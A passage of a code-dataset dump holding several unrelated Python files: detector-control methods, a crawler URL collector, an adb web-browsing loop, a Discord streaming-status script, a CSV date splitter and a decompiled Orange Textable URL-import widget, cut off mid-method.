hl_hv_bias_set(self, name, value):\n        if self.powercard_fem_idx < 0:\n            self.set_error(\"Unable to set HV bias [{}] as server reports no power card\".format(name))\n            return\n        params = []\n        params.append(ExcaliburParameter('fe_hv_bias', [[float(value)]], fem=self.powercard_fem_idx+1))\n        self.hl_write_params(params)\n\n    def hl_start_acquisition(self):\n        with self._comms_lock:\n            self.do_command('start_acquisition', None)\n            return self.wait_for_completion()\n\n    def hl_stop_acquisition(self):\n        with self._comms_lock:\n            self._acquiring = False\n            self.do_command('stop_acquisition', None)\n            return self.wait_for_completion()\n\n    def hl_do_command(self, command):\n        logging.debug(\"Do command: {}\".format(command))\n        with 
self._comms_lock:\n self.do_command(command, None)\n return self.wait_for_completion()\n\n def hl_write_params(self, params):\n logging.debug(\"Writing params: {}\".format(params))\n with self._comms_lock:\n self.write_fe_param(params)\n return self.wait_for_completion()\n\n def hl_read_params(self, params):\n values = None\n with self._comms_lock:\n self.read_fe_param(params)\n cmd_ok, err_msg = self.wait_for_read_completion()\n if cmd_ok:\n values = super(HLExcaliburDetector, self).get('command')['command']['fe_param_read']['value']\n return (cmd_ok, err_msg, values)\n\n def hl_efuseid_read(self):\n response_status = 0\n efuse_dict = {'efuseid_c0': [],\n 'efuseid_c1': [],\n 'efuseid_c2': [],\n 'efuseid_c3': [],\n 'efuseid_c4': [],\n 'efuseid_c5': [],\n 'efuseid_c6': [],\n 'efuseid_c7': [],\n 'efuse_match': []}\n if self._param['config/cal_file_root'].value != '':\n try:\n # First read out the efuse values from the files\n recorded_efuses = {}\n for fem in self._fems:\n efid_parser = ExcaliburEfuseIDParser()\n filename = self._param['config/cal_file_root'].value + \"/fem\" + str(fem) + '/efuseIDs'\n efid_parser.parse_file(filename)\n recorded_efuses[fem] = efid_parser.efuse_ids\n logging.debug(\"EfuseIDs read from file: %s\", recorded_efuses)\n fe_params = ['efuseid']\n read_params = ExcaliburReadParameter(fe_params)\n self.read_fe_param(read_params)\n\n while True:\n time.sleep(0.1)\n if not self.command_pending():\n if self._get('command_succeeded'):\n logging.info(\"Command has succeeded\")\n status = super(HLExcaliburDetector, self).get('command')['command']['fe_param_read']['value']\n fem = 1\n for efuse in status['efuseid']:\n id_match = 1\n efuse_dict['efuseid_c0'].append(efuse[0])\n if recorded_efuses[fem][1] != efuse[0]:\n id_match = 0\n efuse_dict['efuseid_c1'].append(efuse[1])\n if recorded_efuses[fem][2] != efuse[1]:\n id_match = 0\n efuse_dict['efuseid_c2'].append(efuse[2])\n if recorded_efuses[fem][3] != efuse[2]:\n id_match = 0\n efuse_dict['efuseid_c3'].append(efuse[3])\n if recorded_efuses[fem][4] != efuse[3]:\n id_match = 0\n efuse_dict['efuseid_c4'].append(efuse[4])\n if recorded_efuses[fem][5] != efuse[4]:\n id_match = 0\n efuse_dict['efuseid_c5'].append(efuse[5])\n if recorded_efuses[fem][6] != efuse[5]:\n id_match = 0\n efuse_dict['efuseid_c6'].append(efuse[6])\n if recorded_efuses[fem][7] != efuse[6]:\n id_match = 0\n efuse_dict['efuseid_c7'].append(efuse[7])\n if recorded_efuses[fem][8] != efuse[7]:\n id_match = 0\n efuse_dict['efuse_match'].append(id_match)\n fem += 1\n break\n except:\n # Unable to get the efuse IDs so set the dict up with None vales\n response_status = -1\n for efuse_name in efuse_dict:\n efuse_dict[efuse_name].append(None)\n else:\n response_status = -1\n logging.debug(\"No EFUSE ID root directory supplied\")\n \n logging.debug(\"EFUSE: %s\", efuse_dict)\n return response_status, efuse_dict\n\n def get_fem_error_state(self):\n fem_state = self.get('status/fem')['fem']\n logging.debug(\"%s\", fem_state)\n for (idx, state) in enumerate(fem_state):\n yield (idx, state['id'], state['error_code'], state['error_msg'])\n\n def wait_for_completion(self):\n succeeded = False\n err_msg = ''\n try:\n while True:\n time.sleep(0.1)\n if not self.get('status/command_pending')['command_pending']:\n succeeded = self.get('status/command_succeeded')['command_succeeded']\n if succeeded:\n pass\n else:\n logging.error('Command write_fe_param failed on following FEMS:')\n fem_error_count = 0\n for (idx, fem_id, error_code, error_msg) in 
self.get_fem_error_state():\n                        if error_code != 0:\n                            logging.error(\n                                '  FEM idx {} id {} : {} : {}'.format(idx, fem_id, error_code, error_msg))\n                            fem_error_count += 1\n                    err_msg = 'Command write_fe_param failed on {} FEMs'.format(fem_error_count)\n                    break\n\n        except ExcaliburDetectorError as e:\n            err_msg = str(e)\n\n        if not succeeded:\n            self.set_error(err_msg)\n\n        return succeeded, err_msg\n\n    def wait_for_read_completion(self):\n        succeeded = False\n        err_msg = ''\n        try:\n            while True:\n                time.sleep(0.1)\n                if not self.get('status/command_pending')['command_pending']:\n                    succeeded = self.get('status/command_succeeded')['command_succeeded']\n                    if succeeded:\n                        pass\n                    else:\n                        logging.error('Command read_fe_param failed on following FEMS:')\n                        fem_error_count = 0\n                        for (idx, fem_id, error_code, error_msg) in self.get_fem_error_state():\n                            if error_code != 0:\n                                logging.error(\n                                    '  FEM idx {} id {} : {} : {}'.format(idx, fem_id, error_code, error_msg))\n                                fem_error_count += 1\n                        err_msg = 'Command read_fe_param failed on {} FEMs'.format(fem_error_count)\n                    break\n\n        except ExcaliburDetectorError as e:\n            err_msg = str(e)\n\n        if not succeeded:\n            self.set_error(err_msg)\n\n        return succeeded, err_msg\n","sub_path":"control/excalibur/hl_detector.py","file_name":"hl_detector.py","file_ext":"py","file_size_in_byte":81540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"595268363","text":"# -*- coding: utf-8 -*-\r\n'''\r\nCreated on 2016-12-23 11:24\r\n---------\r\n@summary: URL manager, responsible for fetching URLs and storing them in the circular urls list\r\n---------\r\n@author: Boris\r\n'''\r\nimport sys\r\nsys.path.append('..')\r\nimport init\r\nimport threading\r\nimport base.constance as Constance\r\nimport utils.tools as tools\r\nfrom db.mongodb import MongoDB\r\nfrom utils.log import log\r\nimport time\r\n\r\nclass Collector(threading.Thread):\r\n    def __init__(self, tab_urls):\r\n        super(Collector, self).__init__()\r\n        self._lock = threading.RLock()\r\n\r\n        self._db = MongoDB()\r\n        self._thread_stop = False\r\n        self._urls =[]\r\n        self._null_times = 0\r\n        self._tab_urls = tab_urls\r\n        self._depth = int(tools.get_conf_value('config.conf', \"collector\", \"depth\"))\r\n        self._max_size = int(tools.get_conf_value('config.conf', \"collector\", \"max_size\"))\r\n        self._interval = int(tools.get_conf_value('config.conf', \"collector\", \"sleep_time\"))\r\n        self._allowed_null_times = int(tools.get_conf_value('config.conf', \"collector\", 'allowed_null_times'))\r\n        self._url_count = int(tools.get_conf_value('config.conf', \"collector\", \"url_count\"))\r\n\r\n        # On startup, reset tasks still marked as DOING back to TODO\r\n        self._db.update(self._tab_urls, {'status':Constance.DOING}, {'status':Constance.TODO})\r\n\r\n        self._finished_callback = None\r\n\r\n    def run(self):\r\n        while not self._thread_stop:\r\n            self.__input_data()\r\n            time.sleep(self._interval)\r\n\r\n    def stop(self):\r\n        self._thread_stop = True\r\n        if self._finished_callback:\r\n            self._finished_callback()\r\n\r\n    # @tools.log_function_time\r\n    def __input_data(self):\r\n        if len(self._urls) > self._url_count:\r\n            return\r\n\r\n        urls_list = []\r\n        if self._depth:\r\n            urls_list = self._db.find(self._tab_urls, {\"status\":Constance.TODO, \"depth\":{\"$lte\":self._depth}}, limit = self._url_count)\r\n        else:\r\n            urls_list = self._db.find(self._tab_urls, {\"status\":Constance.TODO}, limit = self._url_count)\r\n\r\n        # Mark the fetched URLs as DOING\r\n        for url in urls_list:\r\n            self._db.update(self._tab_urls, url, {'status':Constance.DOING})\r\n\r\n        # Store the URLs\r\n        self.put_urls(urls_list)\r\n\r\n        if 
self.is_all_have_done():\r\n            print('is_all_have_done')\r\n            self.stop()\r\n\r\n    def is_finished(self):\r\n        return self._thread_stop\r\n\r\n    def add_finished_callback(self, callback):\r\n        self._finished_callback = callback\r\n\r\n    # No URLs left to process\r\n    def is_all_have_done(self):\r\n        print('Checking whether any unfinished URLs remain')\r\n        if len(self._urls) == 0:\r\n            self._null_times += 1\r\n            if self._null_times >= self._allowed_null_times:\r\n                # Check the database for URLs still marked as DOING\r\n                urls_doing = self._db.find(self._tab_urls, {'status':Constance.DOING})\r\n                if urls_doing: # URLs are still in progress and the count is changing, so the crawler has not stalled\r\n                    print('URLs still in progress: %s'%len(urls_doing))\r\n                    self._null_times = 0\r\n                    return False\r\n                else:\r\n                    return True\r\n            else:\r\n                return False\r\n        else:\r\n            self._null_times = 0\r\n            return False\r\n\r\n\r\n    # @tools.log_function_time\r\n    def put_urls(self, urls_list):\r\n        self._urls.extend(urls_list)\r\n\r\n    # @tools.log_function_time\r\n    def get_urls(self, count):\r\n        self._lock.acquire() # acquire the lock\r\n\r\n        urls = self._urls[:count]\r\n        del self._urls[:count]\r\n\r\n        self._lock.release()\r\n\r\n        return urls\r\n\r\nif __name__ == '__main__':\r\n    # collector = Collector('news_urls')\r\n    # url = collector.get_urls(20)\r\n    # print(url)\r\n    pass","sub_path":"worker/base/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"589783740","text":"import datetime\nimport subprocess\nimport time\n\ndef print_timestamp():\n\treturn datetime.datetime.now().strftime('%Y-%m-%d.%H%M%S')\n\nyoutube_sites =[\"https://www.youtube.com/watch?v=Lamg_hJVW_U\", # 0:32\n                \"https://www.youtube.com/watch?v=VESKjoxAmZg\", # 0:33\n                \"https://www.youtube.com/watch?v=YVyWObJY9FQ\", # 0:55\n                \"https://www.youtube.com/watch?v=iWC-2nKAgic\", # 1:16\n                \"https://www.youtube.com/watch?v=bbThSb2DImk\", # 1:41\n                \"https://www.youtube.com/watch?v=NDyYvpqp46w\", # 2:21\n                ]\n\nwebsites_lists =[\"https://www.youtube.com/watch?v=Lamg_hJVW_U\", # 0:32\n                 \"https://www.youtube.com/watch?v=VESKjoxAmZg\", # 0:33\n                 \"https://www.youtube.com/watch?v=YVyWObJY9FQ\", # 0:55\n                 \"https://www.youtube.com/watch?v=iWC-2nKAgic\", # 1:16\n                 \"https://www.youtube.com/watch?v=bbThSb2DImk\", # 1:41\n                 \"https://www.youtube.com/watch?v=NDyYvpqp46w\", # 2:21\n                 ]\n\n#https://en.m.wikipedia.org/wiki/1945\nwebsites_lists =[\"https://en.m.wikipedia.org/wiki/\" + str(i) for i in range (1850,2017)]\n\nsleep_duration = 15\ntotal_duration_in_min = 30\n\ndef adb_sites(webpage):\n    print(print_timestamp() + \" \" + \"---Browsing \" + webpage)\n    start_webpage_command = \"adb shell am start -a android.intent.action.VIEW -d \" + webpage\n    start_webpage_command_list = start_webpage_command.split()\n    #print(\"start_webpage_command_list = \" + str(start_webpage_command_list))\n    p=subprocess.Popen(start_webpage_command_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n    print(\"start_webpage Command Status = \" + p.communicate()[0])\n\n\n#Main Part of Program\ntimestart = datetime.datetime.now()\nprint(str(timestart) + \"--Waiting for device\")\nsubprocess.Popen([\"adb wait-for-device root\",\"\"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n\ntime.sleep(5)\n#lapsed_duration = (datetime.datetime.now()-timestart).minute\ntimesince = datetime.datetime.now() - timestart\nminutessince = int(timesince.total_seconds() / 60)\n\nwhile minutessince < total_duration_in_min:\n    for webpage in websites_lists:\n        #print(webpage)\n        adb_sites(webpage)\n        time.sleep(sleep_duration)\n        timesince = 
datetime.datetime.now() - timestart\n minutessince = int(timesince.total_seconds() / 60)\n print(\"Elapsed min = \"+str(minutessince))\n","sub_path":"adb_runApps.py","file_name":"adb_runApps.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"584216779","text":"import discord\r\n\r\nclient = discord.Client()\r\ntoken = \"Discord Token\"\r\ntitle = \"Hello hi hi\"\r\nurl = \"https://twitch.tv/meowcat\"\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(f\" started\\n Title: {title}\\n Url: {url}\")\r\n await client.change_presence(activity=discord.Streaming(name=f\"{title}\", url=f\"{url}\"))\r\n\r\nclient.run(token, bot=False)\r\n","sub_path":"streamingstatus.py","file_name":"streamingstatus.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"48946029","text":"import glob\nimport os\nimport re\nimport time\n\nfolder_path = 'C:\\\\Users\\\\amdge\\\\Desktop\\\\ssd'\ncount = 1\nprint(\"Copying...\")\nfor filename in glob.glob(os.path.join(folder_path, '*.csv')):\n\n with open(filename, \"r\") as f: # open csv as f\n x = re.match(r\"(C:\\\\Users\\\\amdge\\\\Desktop\\\\ssd)\\\\(.*).csv\", filename)\n text = f.read()\n StockLines = text.split(\"\\n\")\n i = 1\n start = time.time()\n r = re.match(\"(\\d{4}-\\d{2}-\\d{2}),(.*)\", StockLines[i])\n olddt = r.group(1)\n with open(\"C:\\\\Users\\\\amdge\\\\Desktop\\\\DATEWISE\\\\\" + r.group(1) + \".txt\", \"a+\") as fj: # open first date as fj\n if count == 1:\n fj.write(\"Time,Open,High,Low,Close,Volume,Stock\\n\")\n\n while StockLines[i] != \"\\0\":\n\n # Counter += 1\n # print(CoList[i])\n r = re.match(\"(\\d{4}-\\d{2}-\\d{2}),(.*)\", StockLines[i])\n if r:\n newdt = r.group(1)\n if olddt != newdt:\n olddt = r.group(1)\n # fj.close()\n fj = open(\"C:\\\\Users\\\\amdge\\\\Desktop\\\\DATEWISE\\\\\" + olddt + \".txt\", \"a+\")\n if count == 1:\n fj.write(\"Time,Open,High,Low,Close,Volume,Stock\\n\")\n continue\n fj.write(r.group(2) + \",\" + x.group(2) + \"\\n\")\n i += 1\n else:\n # fj.close()\n break\n # f.close()\n end = time.time()\n print(\n \"Completed for \" + x.group(2) + \" stock\" + \". Execution time: \" + str(round((end - start), 2)) + \" seconds\")\n count = 2\nprint(\"Copied all files\")\n ","sub_path":"datewise.py","file_name":"datewise.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"18228437","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\_textable\\widgets\\OWTextableURLs.py\n# Compiled at: 2016-08-11 09:23:10\n\"\"\"\nClass OWTextableURLs\nCopyright 2012-2016 LangTech Sarl (info@langtech.ch)\n-----------------------------------------------------------------------------\nThis file is part of the Orange-Textable package v2.0.\n\nOrange-Textable v2.0 is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nOrange-Textable v2.0 is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with Orange-Textable v2.0. If not, see .\n\"\"\"\n__version__ = '0.14.2'\nimport codecs, urllib, re, json\nfrom unicodedata import normalize\nfrom LTTL.Segmentation import Segmentation\nfrom LTTL.Input import Input\nimport LTTL.Segmenter as Segmenter\nfrom TextableUtils import *\nfrom Orange.OrangeWidgets.OWWidget import *\nimport OWGUI\n\nclass OWTextableURLs(OWWidget):\n \"\"\"Orange widget for fetching text from URLs\"\"\"\n settingsList = [\n 'URLs',\n 'encoding',\n 'autoSend',\n 'autoNumber',\n 'autoNumberKey',\n 'importURLs',\n 'importURLsKey',\n 'displayAdvancedSettings',\n 'lastLocation',\n 'URL',\n 'uuid']\n\n def __init__(self, parent=None, signalManager=None):\n OWWidget.__init__(self, parent, signalManager, wantMainArea=0, wantStateInfoWidget=0)\n self.inputs = [\n (\n 'Message', JSONMessage, self.inputMessage, Single)]\n self.outputs = [\n (\n 'Text data', Segmentation)]\n self.URLs = list()\n self.encoding = 'utf-8'\n self.autoSend = True\n self.autoNumber = False\n self.autoNumberKey = 'num'\n self.importURLs = True\n self.importURLsKey = 'url'\n self.lastLocation = '.'\n self.displayAdvancedSettings = False\n self.URL = ''\n self.uuid = None\n self.loadSettings()\n self.uuid = getWidgetUuid(self)\n self.segmentation = None\n self.createdInputs = list()\n self.URLLabel = list()\n self.selectedURLLabel = list()\n self.newURL = ''\n self.newAnnotationKey = ''\n self.newAnnotationValue = ''\n self.infoBox = InfoBox(widget=self.controlArea)\n self.sendButton = SendButton(widget=self.controlArea, master=self, callback=self.sendData, infoBoxAttribute='infoBox', sendIfPreCallback=self.updateGUI)\n self.advancedSettings = AdvancedSettings(widget=self.controlArea, master=self, callback=self.sendButton.settingsChanged)\n self.advancedSettings.draw()\n basicURLBox = OWGUI.widgetBox(widget=self.controlArea, box='Source', orientation='vertical')\n basicURLBoxLine1 = OWGUI.widgetBox(widget=basicURLBox, box=False, orientation='horizontal')\n OWGUI.lineEdit(widget=basicURLBoxLine1, master=self, value='URL', orientation='horizontal', label='URL:', labelWidth=101, callback=self.sendButton.settingsChanged, tooltip='The URL whose content will be imported.')\n OWGUI.separator(widget=basicURLBox, height=3)\n OWGUI.comboBox(widget=basicURLBox, master=self, value='encoding', items=getPredefinedEncodings(), sendSelectedValue=True, orientation='horizontal', label='Encoding:', labelWidth=101, callback=self.sendButton.settingsChanged, tooltip=\"Select URL's encoding.\")\n OWGUI.separator(widget=basicURLBox, height=3)\n self.advancedSettings.basicWidgets.append(basicURLBox)\n self.advancedSettings.basicWidgetsAppendSeparator()\n URLBox = OWGUI.widgetBox(widget=self.controlArea, box='Sources', orientation='vertical')\n URLBoxLine1 = OWGUI.widgetBox(widget=URLBox, box=False, orientation='horizontal', addSpace=True)\n self.fileListbox = OWGUI.listBox(widget=URLBoxLine1, master=self, value='selectedURLLabel', labels='URLLabel', callback=self.updateURLBoxButtons, tooltip='The list of URLs whose content will be imported.\\n\\nIn the output segmentation, the content of each\\nURL appears in the same position as in the list.\\n\\nColumn 1 shows the URL.\\nColumn 2 shows the associated annotation (if any).\\nColumn 3 shows the associated encoding.')\n font = QFont()\n font.setFamily('Courier')\n font.setStyleHint(QFont.Courier)\n font.setPixelSize(12)\n 
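# A fixed-width font is deliberate here: the URL / annotation / encoding\n        # columns are padded with '%-Ns' formatting in updateGUI(), so they only\n        # line up in the listbox when every character has the same width.\n        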
self.fileListbox.setFont(font)\n URLBoxCol2 = OWGUI.widgetBox(widget=URLBoxLine1, orientation='vertical')\n self.moveUpButton = OWGUI.button(widget=URLBoxCol2, master=self, label='Move Up', callback=self.moveUp, tooltip='Move the selected URL upward in the list.')\n self.moveDownButton = OWGUI.button(widget=URLBoxCol2, master=self, label='Move Down', callback=self.moveDown, tooltip='Move the selected URL downward in the list.')\n self.removeButton = OWGUI.button(widget=URLBoxCol2, master=self, label='Remove', callback=self.remove, tooltip='Remove the selected URL from the list.')\n self.clearAllButton = OWGUI.button(widget=URLBoxCol2, master=self, label='Clear All', callback=self.clearAll, tooltip='Remove all URLs from the list.')\n self.exportButton = OWGUI.button(widget=URLBoxCol2, master=self, label='Export List', callback=self.exportList, tooltip='Open a dialog for selecting a file where the URL\\nlist can be exported in JSON format.')\n self.importButton = OWGUI.button(widget=URLBoxCol2, master=self, label='Import List', callback=self.importList, tooltip='Open a dialog for selecting an URL list to\\nimport (in JSON format). URLs from this list will\\nbe added to those already imported.')\n URLBoxLine2 = OWGUI.widgetBox(widget=URLBox, box=False, orientation='vertical')\n addURLBox = OWGUI.widgetBox(widget=URLBoxLine2, box=True, orientation='vertical')\n OWGUI.lineEdit(widget=addURLBox, master=self, value='newURL', orientation='horizontal', label='URL(s):', labelWidth=101, callback=self.updateGUI, tooltip=\"The URL(s) that will be added to the list when\\nbutton 'Add' is clicked.\\n\\nSuccessive URLs must be separated with ' / ' \\n(space + slash + space). Their order in the list\\n will be the same as in this field.\")\n OWGUI.separator(widget=addURLBox, height=3)\n OWGUI.comboBox(widget=addURLBox, master=self, value='encoding', items=getPredefinedEncodings(), sendSelectedValue=True, orientation='horizontal', label='Encoding:', labelWidth=101, callback=self.updateGUI, tooltip=\"Select URL's encoding.\")\n OWGUI.separator(widget=addURLBox, height=3)\n OWGUI.lineEdit(widget=addURLBox, master=self, value='newAnnotationKey', orientation='horizontal', label='Annotation key:', labelWidth=101, callback=self.updateGUI, tooltip='This field lets you specify a custom annotation\\nkey associated with each URL that is about to be\\nadded to the list.')\n OWGUI.separator(widget=addURLBox, height=3)\n OWGUI.lineEdit(widget=addURLBox, master=self, value='newAnnotationValue', orientation='horizontal', label='Annotation value:', labelWidth=101, callback=self.updateGUI, tooltip='This field lets you specify the annotation value\\nassociated with the above annotation key.')\n OWGUI.separator(widget=addURLBox, height=3)\n self.addButton = OWGUI.button(widget=addURLBox, master=self, label='Add', callback=self.add, tooltip=\"Add the URL currently displayed in the 'URL'\\ntext field to the list.\")\n self.advancedSettings.advancedWidgets.append(URLBox)\n self.advancedSettings.advancedWidgetsAppendSeparator()\n optionsBox = OWGUI.widgetBox(widget=self.controlArea, box='Options', orientation='vertical')\n optionsBoxLine1 = OWGUI.widgetBox(widget=optionsBox, box=False, orientation='horizontal')\n OWGUI.checkBox(widget=optionsBoxLine1, master=self, value='importURLs', label='Import URLs with key:', labelWidth=180, callback=self.sendButton.settingsChanged, tooltip='Import URLs as annotations.')\n self.importURLsKeyLineEdit = OWGUI.lineEdit(widget=optionsBoxLine1, master=self, value='importURLsKey', 
orientation='horizontal', callback=self.sendButton.settingsChanged, tooltip='Annotation key for importing URLs.')\n OWGUI.separator(widget=optionsBox, height=3)\n optionsBoxLine2 = OWGUI.widgetBox(widget=optionsBox, box=False, orientation='horizontal')\n OWGUI.checkBox(widget=optionsBoxLine2, master=self, value='autoNumber', label='Auto-number with key:', labelWidth=180, callback=self.sendButton.settingsChanged, tooltip='Annotate URLs with increasing numeric indices.')\n self.autoNumberKeyLineEdit = OWGUI.lineEdit(widget=optionsBoxLine2, master=self, value='autoNumberKey', orientation='horizontal', callback=self.sendButton.settingsChanged, tooltip='Annotation key for URL auto-numbering.')\n OWGUI.separator(widget=optionsBox, height=3)\n self.advancedSettings.advancedWidgets.append(optionsBox)\n self.advancedSettings.advancedWidgetsAppendSeparator()\n OWGUI.rubber(self.controlArea)\n self.sendButton.draw()\n self.infoBox.draw()\n self.sendButton.sendIf()\n self.adjustSizeWithTimer()\n return\n\n def inputMessage(self, message):\n \"\"\"Handle JSON message on input connection\"\"\"\n if not message:\n return\n else:\n self.displayAdvancedSettings = True\n self.advancedSettings.setVisible(True)\n self.clearAll()\n self.infoBox.inputChanged()\n try:\n json_data = json.loads(message.content)\n temp_URLs = list()\n for entry in json_data:\n URL = entry.get('url', '')\n encoding = entry.get('encoding', '')\n annotationKey = entry.get('annotation_key', '')\n annotationValue = entry.get('annotation_value', '')\n if URL == '' or encoding == '':\n self.infoBox.setText('Please verify keys and values of incoming JSON message.', 'error')\n self.send('Text data', None, self)\n return\n temp_URLs.append((\n URL,\n encoding,\n annotationKey,\n annotationValue))\n\n self.URLs.extend(temp_URLs)\n self.sendButton.settingsChanged()\n except ValueError:\n self.infoBox.setText('Please make sure that incoming message is valid JSON.', 'error')\n self.send('Text data', None, self)\n return\n\n return\n\n def sendData(self):\n \"\"\"Fetch URL content, create and send segmentation\"\"\"\n if self.displayAdvancedSettings and not self.URLs or not (self.URL or self.displayAdvancedSettings):\n self.infoBox.setText('Please select source URL.', 'warning')\n self.send('Text data', None, self)\n return\n else:\n if self.displayAdvancedSettings and self.autoNumber:\n if self.autoNumberKey:\n autoNumberKey = self.autoNumberKey\n else:\n self.infoBox.setText('Please enter an annotation key for auto-numbering.', 'warning')\n self.send('Text data', None, self)\n return\n else:\n autoNumberKey = None\n self.clearCreatedInputs()\n URLContents = list()\n annotations = list()\n counter = 1\n if self.displayAdvancedSettings:\n myURLs = self.URLs\n else:\n myURLs = [\n [\n self.URL, self.encoding, '', '']]\n progressBar = OWGUI.ProgressBar(self, iterations=len(myURLs))\n for myURL in myURLs:\n URL = myURL[0]\n encoding = myURL[1]\n annotation_key = myURL[2]\n annotation_value = myURL[3]\n self.error()\n try:\n URLHandle = urllib.urlopen(URL)\n try:\n try:\n URLContent = URLHandle.read().decode(encoding)\n except UnicodeError:\n progressBar.finish()\n if len(myURLs) > 1:\n message = 'Please select another encoding ' + 'for URL %s.' 
% URL\n else:\n message = 'Please select another encoding.'\n self.infoBox.setText(message, 'error')\n self.send('Text data', None, self)\n return\n\n finally:\n URLHandle.close()\n\n except IOError:\n progressBar.finish()\n if len(myURLs) > 1:\n message = \"Couldn't retrieve %s.\" % URL\n else:\n message = \"Couldn't retrieve URL.\"\n self.infoBox.setText(message, 'error')\n self.send('Text data', None, self)\n return\n\n URLContent = ('\\n').join(URLContent.splitlines())\n if encoding == 'utf-8':\n URLContent = URLContent.lstrip(unicode(codecs.BOM_UTF8, 'utf-8'))\n URLContent = normalize('NFC', URLContent)\n URLContents.append(URLContent)\n annotation = dict()\n if self.displayAdvancedSettings:\n if annotation_key and annotation_value:\n annotation[annotation_key] = annotation_value\n if self.importURLs and self.importURLsKey:\n annotation[self.importURLsKey] = URL\n if self.autoNumber and self.autoNumberKey:\n annotation[self.autoNumberKey] = counter\n counter += 1\n annotations.append(annotation)\n progressBar.advance()\n\n if len(URLContents) == 1:\n label = self.captionTitle\n else:\n label = None\n for index in xrange(len(URLContents)):\n myInput = Input(URLContents[index], label)\n segment = myInput[0]\n segment.annotations.update(annotations[index])\n myInput[0] = segment\n self.createdInputs.append(myInput)\n\n if len(URLContents) == 1:\n self.segmentation = self.createdInputs[0]\n else:\n self.segmentation = Segmenter.concatenate(segmentations=self.createdInputs, label=self.captionTitle, copy_annotations=True, import_labels_as=None, sort=False, auto_number_as=None, merge_duplicates=False, progress_callback=None)\n message = '%i segment@p sent to output ' % len(self.segmentation)\n message = pluralize(message, len(self.segmentation))\n numChars = 0\n for segment in self.segmentation:\n segmentLength = len(Segmentation.get_data(segment.str_index))\n numChars += segmentLength\n\n message += '(%i character@p).' 
% numChars\n message = pluralize(message, numChars)\n self.infoBox.setText(message)\n progressBar.finish()\n self.send('Text data', self.segmentation, self)\n self.sendButton.resetSettingsChangedFlag()\n return\n\n def clearCreatedInputs(self):\n for i in self.createdInputs:\n Segmentation.set_data(i[0].str_index, None)\n\n del self.createdInputs[:]\n return\n\n def importList(self):\n \"\"\"Display a FileDialog and import URL list\"\"\"\n filePath = unicode(QFileDialog.getOpenFileName(self, 'Import URL List', self.lastLocation, 'Text files (*)'))\n if not filePath:\n return\n else:\n self.file = os.path.normpath(filePath)\n self.lastLocation = os.path.dirname(filePath)\n self.error()\n try:\n fileHandle = codecs.open(filePath, encoding='utf8')\n fileContent = fileHandle.read()\n fileHandle.close()\n except IOError:\n QMessageBox.warning(None, 'Textable', \"Couldn't open file.\", QMessageBox.Ok)\n return\n\n try:\n json_data = json.loads(fileContent)\n temp_URLs = list()\n for entry in json_data:\n URL = entry.get('url', '')\n encoding = entry.get('encoding', '')\n annotationKey = entry.get('annotation_key', '')\n annotationValue = entry.get('annotation_value', '')\n if URL == '' or encoding == '':\n QMessageBox.warning(None, 'Textable', \"Selected JSON file doesn't have the right keys and/or values.\", QMessageBox.Ok)\n return\n temp_URLs.append((\n URL,\n encoding,\n annotationKey,\n annotationValue))\n\n self.URLs.extend(temp_URLs)\n if temp_URLs:\n self.sendButton.settingsChanged()\n except ValueError:\n QMessageBox.warning(None, 'Textable', 'Selected file is not in JSON format.', QMessageBox.Ok)\n return\n\n return\n\n def exportList(self):\n \"\"\"Display a FileDialog and export URL list\"\"\"\n toDump = list()\n for URL in self.URLs:\n toDump.append({'url': URL[0], \n 'encoding': URL[1]})\n if URL[2] and URL[3]:\n toDump[(-1)]['annotation_key'] = URL[2]\n toDump[(-1)]['annotation_value'] = URL[3]\n\n filePath = unicode(QFileDialog.getSaveFileName(self, 'Export URL List', self.lastLocation))\n if filePath:\n self.lastLocation = os.path.dirname(filePath)\n outputFile = codecs.open(filePath, encoding='utf8', mode='w', errors='xmlcharrefreplace')\n outputFile.write(normalizeCarriageReturns(json.dumps(toDump, sort_keys=True, indent=4)))\n outputFile.close()\n QMessageBox.information(None, 'Textable', 'URL list correctly exported', QMessageBox.Ok)\n return\n\n def moveUp(self):\n \"\"\"Move URL upward in URLs listbox\"\"\"\n if self.selectedURLLabel:\n index = self.selectedURLLabel[0]\n if index > 0:\n temp = self.URLs[(index - 1)]\n self.URLs[index - 1] = self.URLs[index]\n self.URLs[index] = temp\n self.selectedURLLabel.listBox.item(index - 1).setSelected(1)\n self.sendButton.settingsChanged()\n\n def moveDown(self):\n \"\"\"Move URL downward in URLs listbox\"\"\"\n if self.selectedURLLabel:\n index = self.selectedURLLabel[0]\n if index < len(self.URLs) - 1:\n temp = self.URLs[(index + 1)]\n self.URLs[index + 1] = self.URLs[index]\n self.URLs[index] = temp\n self.selectedURLLabel.listBox.item(index + 1).setSelected(1)\n self.sendButton.settingsChanged()\n\n def clearAll(self):\n \"\"\"Remove all URLs from URLs attr\"\"\"\n del self.URLs[:]\n del self.selectedURLLabel[:]\n self.sendButton.settingsChanged()\n\n def remove(self):\n \"\"\"Remove URL from URLs attr\"\"\"\n if self.selectedURLLabel:\n index = self.selectedURLLabel[0]\n self.URLs.pop(index)\n del self.selectedURLLabel[:]\n self.sendButton.settingsChanged()\n\n def add(self):\n \"\"\"Add URLs to URLs attr\"\"\"\n URLList = 
